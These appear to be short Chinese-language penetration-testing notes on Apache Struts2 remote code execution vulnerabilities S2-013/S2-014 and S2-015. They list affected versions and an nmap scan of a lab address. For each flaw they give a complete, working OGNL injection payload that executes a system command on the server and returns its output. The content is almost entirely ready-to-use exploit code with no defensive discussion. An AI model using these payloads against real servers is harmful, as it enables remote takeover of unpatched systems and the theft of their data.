(cve-2013-1966)(CVE-2013-2134,CVE-2013-2135)
Struts2-013/Struts2-014 远程代码执行漏洞(cve-2013-1966)
影响范围:Struts2-013影响Struts2 2.0.0-2.3.1.1版本;Struts2-014影响Struts2 2.0.0-2.3.14.1版本
信息收集:nmap 192.168.85.130 -p 8080 -sV -A
payload需要url编码:${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())}
Struts2-015 远程代码执行漏洞(CVE-2013-2134,CVE-2013-2135)
影响范围:Struts2-015影响Struts2 2.0.0-2.3.14.2版本
信息收集:nmap 192.168.85.130 -p 8080 -sV -A
payload需要url编码:${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()),#q}
